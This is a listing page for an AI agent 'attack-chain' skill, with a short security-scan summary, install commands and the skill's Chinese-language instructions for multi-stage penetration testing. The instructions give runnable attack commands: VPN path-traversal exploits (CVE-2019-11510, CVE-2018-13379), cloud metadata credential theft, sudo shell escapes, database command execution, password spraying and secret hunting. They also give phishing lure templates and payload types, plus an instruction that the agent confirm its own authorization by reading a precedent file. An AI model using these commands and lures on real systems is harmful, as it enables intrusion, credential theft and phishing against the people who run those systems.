attack-chain skill
Use for authorized multi-stage attack-path planning and orchestration when a task spans reconnaissance, initial access, privilege escalation, lateral movement, or impact assessment. Route single-stage tasks directly to their specialist skill.
Is the attack-chain skill safe?
Read the findings before you install it. We read 4 files in the folder on 2026-09-28.
- high
SKILL.md:259Reads credential files (SSH keys, cloud or package-manager tokens) that a skill has no normal reason to touch.
curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/" - medium
SKILL.md:504Edits shell startup files, cron or launch agents, so something runs again after the skill is done.
systemctl enable update.service
Install the attack-chain skill
A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description.
git clone --depth 1 https://github.com/zhaoxuya520/reverse-skill.git /tmp/reverse-skill mkdir -p ~/.claude/skills cp -r /tmp/reverse-skill/skills/attack-chain ~/.claude/skills/attack-chain
In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub
The instructions your agent would load
SKILL.md as published, without the frontmatter. Read it on GitHub
Attack Chain Orchestration Skill
ACTION REQUIRED(读完后立刻执行)
- NOW: 读取 ../field-journal/precedent-pentest.md — 确认本 skill 的操作是已授权的常规操作
- NOW: 创建/更新 case(../scripts/case-init.ps1)并完成 scope.md(../ops/scope-contract.md);auth.status!=granted 禁止 ACT
- NOW: 以 lead 角色规划阶段(../ops/role-map.md),写入 specialist_roles
- NEXT: 读取 ../tool-index.md,校验工具可用性和实际路径
- NEXT: 缺工具时调用 bootstrap,不要猜路径
- ACT: 按 references/lifecycle-checklist.md 过阶段门闩;每阶段更新 timeline.md + workitems.md(../ops/timeline-workitem.md);发现提升为 Evidence/Finding
- 结束:docs-generator 报告必须含 Evidence 链
多阶段攻击路径规划与执行的总指挥。当任务需要"从 A 打到 B"的完整链路时,本 Skill 负责编排各阶段、协调子 Skill、规划攻击路径。
不是"红队专属"——任何需要跨阶段组合的渗透场景都从这里开始。
何时路由到本 Skill
以下场景必须先经过本 Skill 做全链路规划,再分发到具体子 Skill 执行:
单阶段任务不需要经过本 Skill:
- 只做端口扫描 → 直接去 pentest-tools/
- 只做 SQL 注入 → 直接去 pentest-tools/
- 只做 APK 逆向 → 直接去 apk-reverse/
- 只做域渗透 → 直接去 windows-ad/SKILL.md
编排原则
本 Skill 的角色
用户提出多阶段任务
↓
attack-chain/SKILL.md(本文件)
↓ 规划攻击路径、确定阶段顺序
↓ 评估每阶段所需工具和方法
↓
分发到具体子 Skill 执行:
├── pentest-tools/ → 工具调用、漏洞利用
├── apk-reverse/ → 移动端渗透
├── js-reverse/ → Web 前端突破
├── reverse-engineering/ → 二进制分析
├── ida-reverse/ → 深度逆向
└── browser-automation/ → 自动化操作
↓
每阶段完成后回到本 Skill 评估下一步
↓
全部完成 → docs-generator 生成报告路径规划决策树
拿到目标后:
1. 目标是什么?(Web/内网/云/移动/IoT)
2. 当前有什么?(外部视角/已有凭据/已有据点)
3. 最终目标是什么?(域控/数据/特定系统/证明影响)
4. 约束条件?(时间/隐蔽性/不可触碰的系统)
↓
根据以上信息规划最短路径
↓
一条路走不通 → 回到本 Skill 重新规划备选路径完整攻击链阶段
一、信息收集阶段(Reconnaissance)
1.1 企业数字资产测绘
# 子公司关联域名发现
subfinder -d target.com -o subdomains.txt
amass enum -d target.com -passive -o amass_results.txt
# 合并去重
cat subdomains.txt amass_results.txt | sort -u > all_subs.txt
# 存活探测
httpx -l all_subs.txt -status-code -title -tech-detect -o alive.txt
# 端口扫描(全端口)
naabu -l all_subs.txt -top-ports 1000 -o ports.txt
nmap -sV -sC -iL targets.txt -oA nmap_results实战要点:
- 通过企查查/天眼查获取子公司列表,扩大攻击面
- 关注测试环境(test.、dev.、staging.)和新上线系统
- 证书透明度日志(crt.sh)发现隐藏域名
1.2 敏感信息泄露狩猎
# GitHub 搜索
# org:Company filename:.env password
# org:Company filename:config.yml secret
# org:Company "jdbc:mysql" password
# Google Dork
# site:target.com filetype:sql
# site:target.com inurl:admin
# site:target.com ext:conf|cfg|ini
# JS 文件中的 API Key
cat js_urls.txt | while read url; do
curl -s "$url" | grep -oP '(api[_-]?key|secret|token|password)\s*[:=]\s*["\047][^"\047]+'
done高价值目标:
- 云服务 AK/SK(阿里云、AWS、Azure)
- 数据库连接字符串
- JWT 密钥
- 内部 API 文档
- VPN/堡垒机凭据
1.3 员工信息画像
社工字典生成规则:
{姓名拼音}{年份} → zhangsan2024
{姓名首字母}{部门缩写} → zs_dev
{工号}@{域名} → 10086@target.com
{姓名}{常见后缀} → zhangsan@123, zhangsan!@#信息来源:
- 脉脉/LinkedIn 部门架构
- 企业公众号/官网团队介绍
- 招聘信息(技术栈暴露)
- 学术论文(邮箱暴露)
1.4 技术栈指纹识别
# Web 指纹
whatweb -i alive.txt --log-json=fingerprint.json
httpx -l alive.txt -tech-detect -json -o tech.json
# 特定框架探测
nuclei -l alive.txt -tags tech -severity info -o tech_results.txt
# CMS 识别
wpscan --url https://target.com --enumerate p,t,u二、边界突破阶段(Initial Access)
2.1 Web 漏洞利用(高频突破点)
# SQL 注入自动化
sqlmap -u "https://target.com/api?id=1" --batch --dbs --random-agent
# SSTI 检测
sstimap -u "https://target.com/search?q=test"
# Nuclei 批量扫描
nuclei -l alive.txt -severity critical,high -tags cve,sqli,rce -o vulns.txt2.2 供应链攻击
攻击路径:
- 识别目标使用的第三方组件/服务商
- 攻击供应商获取代码签名/更新推送权限
- 通过合法更新通道投递恶意载荷
常见入口:
- 开源组件投毒(npm/pip/maven)
- SaaS 服务商 API 滥用
- 外包人员权限利用
- 共享 IT 服务商横向渗透
2.3 钓鱼攻击
邮件钓鱼:
主题模板:
- [紧急] VPN 证书即将过期,请立即更新
- [IT通知] 邮箱存储空间不足,请清理
- [HR] 2024年度绩效考核结果查询
- [财务] 报销系统升级,请重新登录确认载荷类型:
- Office 宏文档(.docm/.xlsm)
- LNK 快捷方式(伪装 PDF)
- HTML 走私(HTML Smuggling)
- ISO/IMG 镜像(绕过 MOTW)
- OneNote 嵌入脚本
OAuth 钓鱼(2025 新趋势):
- 构造恶意 OAuth 应用请求权限
- 用户授权后获取邮箱/文件访问权限
- 无需密码,绕过 MFA
2.4 近源渗透(Physical Access)
# Fluxion WiFi 钓鱼
fluxion # 交互式选择目标 AP → 创建伪造热点 → 捕获 WPA 密码
# BadUSB 联动 Cobalt Strike
# 通过 USB 注入 PowerShell 下载器 → 上线 C22.5 VPN/远程接入突破
# Pulse Secure VPN(CVE-2019-11510)
curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/"
# Fortinet VPN(CVE-2018-13379)
curl -k "https://vpn.target.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
# 通用:密码喷洒
hydra -L users.txt -P passwords.txt vpn.target.com https-form-post2.6 云服务突破
# AWS S3 桶枚举
aws s3 ls s3://target-bucket --no-sign-request
# 云元数据 SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure AD 密码喷洒
# 使用 MSOLSpray / Spray 工具三、权限提升阶段(Privilege Escalation)
3.1 Windows 提权
# 检测 SeImpersonate
whoami /priv | findstr "SeImpersonate"
# Potato 提权
.\GodPotato.exe -cmd "cmd /c whoami"
# 自动化检测
.\winPEAS.exe3.2 Linux 提权
# SUID 检测
find / -perm -4000 -type f 2>/dev/null
# sudo 滥用
sudo -l
# 常见可利用:vim, find, python, nmap, less, awk, perl
# sudo vim 提权
sudo vim -c ':!/bin/bash'
# sudo find 提权
sudo find / -exec /bin/bash \;
# 内核漏洞
uname -r # 检查版本
# DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195)
# 自动化检测
./linpeas.sh3.3 数据库提权
-- MSSQL xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
-- MySQL UDF 提权
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');
-- PostgreSQL
COPY (SELECT '') TO PROGRAM 'id';3.4 云权限提升
More skills from zhaoxuya520/reverse-skill
- Fapi-securityUse for authorized security assessment of REST, GraphQL, WebSocket, or SOAP APIs, including discovery, authentication, authorization, rate-limit, and CI/CD testing.
- Capk-reverse在 CLI 环境下做 Android APK 逆向时使用。适用于 APK 解包、Java 反编译、smali 修改、重打包、Frida 动态 Hook,以及按需切换到 so/native 分析。优先使用本机已安装的 jadx、apktool、frida、adb、ida-reverse、radare2。
- Abinary-diff跨版本符号迁移与二进制差分。当你有旧版本的符号/逆向结果,需要快速迁移到新版本时使用。 适用场景:内核缺 PDB 用旧版符号推导、程序更新后批量迁移函数名、应用更新后快速定位新偏移。 核心方法:用 LLM 做结构化差异比对,程序化输入输出,成本极低(200 函数 ~1 元)。 触发关键词:符号迁移、bindiff、跨版本、PDB 缺失、函数偏移迁移、symbol migration、binary diff、版本对比。
- Abinary-ninja-reverseUse for authorized binary analysis in Binary Ninja, including HLIL/MLIL/LLIL inspection, strings/imports/exports, cross-references, types, patch review, Python API automation, and optional Binary Ninja MCP or localhost HTTP integration.
- Abrowser-automation统一自动化入口。覆盖浏览器自动化(Playwright)和 Windows 桌面应用自动化(OpenReverse)。 浏览器场景:打开网页、点击、填表、爬取、截图、自动化登录、渗透页面交互。 桌面场景:操作 IDA/x64dbg 等 GUI 工具、Windows UI Automation、视觉驱动交互、桌面应用网络抓包。 触发关键词:浏览器自动化、桌面自动化、打开网页、填表、爬取、截图、自动化登录、Playwright、agent-browser、headless、OpenReverse、UIA、CUA、桌面操作、Windows 自动化。
- Abrowser-extension-reverseUse for authorized reverse engineering of browser extensions (Chrome/Firefox) including manifest analysis, background workers, and extension-based credential or traffic logic recovery.
- Acase-reviewReviews a reverse-skill case package for scope readiness, Evidence to Finding to Path traceability, work item coverage, timeline references, and optional artifact hash integrity before report handoff.
- Acloud-k8sUse for authorized cloud, container, and Kubernetes security assessment including metadata SSRF, IAM misconfig, container escape paths, and cluster RBAC review.
- Acode-auditUse for authorized source-code security review and SAST workflows including Semgrep, CodeQL patterns, dangerous API hunting, and fix verification.
- Acompetition-ad-certificate-abuseInternal downstream skill for ctf-sandbox-orchestrator. CTF-sandbox workflow for AD CS, certificate templates, enrollment rights, EKUs, SAN controls, PKINIT, certificate mapping, and cert-based privilege paths. Use when the user asks about ESC-style abuse, certificate templates, enrollment agents, EKUs, SAN or subject controls, smartcard or PKINIT logon, CA policy, or how an issued cert turns into accepted privilege. Use only after `$ctf-sandbox-orchestrator` has already established sandbox assumptions and routed here.
- Acompetition-agent-cloudInternal downstream skill for ctf-sandbox-orchestrator. CTF-sandbox workflow for AI-agent, prompt-injection, MCP or toolchain, cloud, container, CI/CD, and supply-chain challenges. Use when the user asks to analyze prompt-to-tool flows, retrieval poisoning, mounted secrets, deployment drift, runtime-vs-manifest mismatches, registry provenance, or CI-produced artifacts under sandbox assumptions. Use only after `$ctf-sandbox-orchestrator` has already established sandbox assumptions and routed here.
- Acompetition-android-hookingInternal downstream skill for ctf-sandbox-orchestrator. CTF-sandbox workflow for Android APK hooking, Frida tracing, request-signing recovery, SSL pinning bypass, JNI boundary inspection, and app trust-boundary analysis. Use when the user asks to hook an APK, inspect signer logic, trace Java or native boundaries, bypass pinning or root checks, inspect shared prefs or app databases, or replay accepted mobile requests. Use only after `$ctf-sandbox-orchestrator` has already established sandbox assumptions and routed here.